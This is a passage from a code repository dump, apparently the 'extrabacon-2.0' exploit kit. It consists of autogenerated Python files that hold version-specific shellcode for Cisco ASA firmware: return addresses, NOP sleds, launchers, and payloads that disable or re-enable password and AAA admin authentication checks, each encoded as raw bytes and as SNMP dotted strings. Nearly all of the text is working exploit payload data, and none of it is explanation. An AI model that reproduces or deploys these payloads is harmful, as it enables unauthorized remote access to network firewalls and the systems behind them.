"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.253.149.86.9.80.184.165.180.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\xae\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xe0\x01\x0b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.174.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.224.1.11.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xe0\x01\x0b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\xae\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.224.1.11.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.174.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x70\x65\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.112.101.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x70\x65\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.112.101.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa804.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa804" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x6d\xbc\x1a\x09" 11 | 12 | my_ret_addr_snmp = "109.188.26.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\x29\xc1\x0d\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.41.193.13.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xbd\x3d\x61\x09\x50\xb8\x75\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.189.61.97.9.80.184.117.183.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xbd\x3d\x61\x09\x50\xb8\x75\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.189.61.97.9.80.184.117.183.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xb6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x65\x13\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.182.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.101.19.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x80\x65\x13\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xb6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.128.101.19.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.182.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x68\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.104.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\xb0\x68\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.104.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa804_32.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa804-32" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9d\x06\x1f\x09" 11 | 12 | my_ret_addr_snmp = "157.6.31.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x89\xb1\x0e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.137.177.14.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x4c\x9f\x67\x09\x50\xb8\x15\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.76.159.103.9.80.184.21.183.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 
47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x4c\x9f\x67\x09\x50\xb8\x15\xb7\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.76.159.103.9.80.184.21.183.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\xb2\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x00\xb0\x17\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.178.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.0.176.23.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\x00\xb0\x17\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\xb2\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.0.176.23.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.178.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\x69\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.105.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x30\x69\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.105.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa805.py: 
-------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa805" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xfd\x74\x1f\x09" 11 | 12 | my_ret_addr_snmp = "253.116.31.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x69\xe5\x0e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.105.229.14.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x6c\x4c\x68\x09\x50\xb8\x15\xb1\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.108.76.104.9.80.184.21.177.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x6c\x4c\x68\x09\x50\xb8\x15\xb1\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 
"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.108.76.104.9.80.184.21.177.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x85\xbd\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x20\x18\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.133.189.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.32.24.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x40\x20\x18\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x85\xbd\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.64.32.24.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.133.189.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x6b\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.107.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x80\x6b\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.128.107.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa821.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa821" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x93\xf2\x2b\x09" 11 | 12 | my_ret_addr_snmp = "147.242.43.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 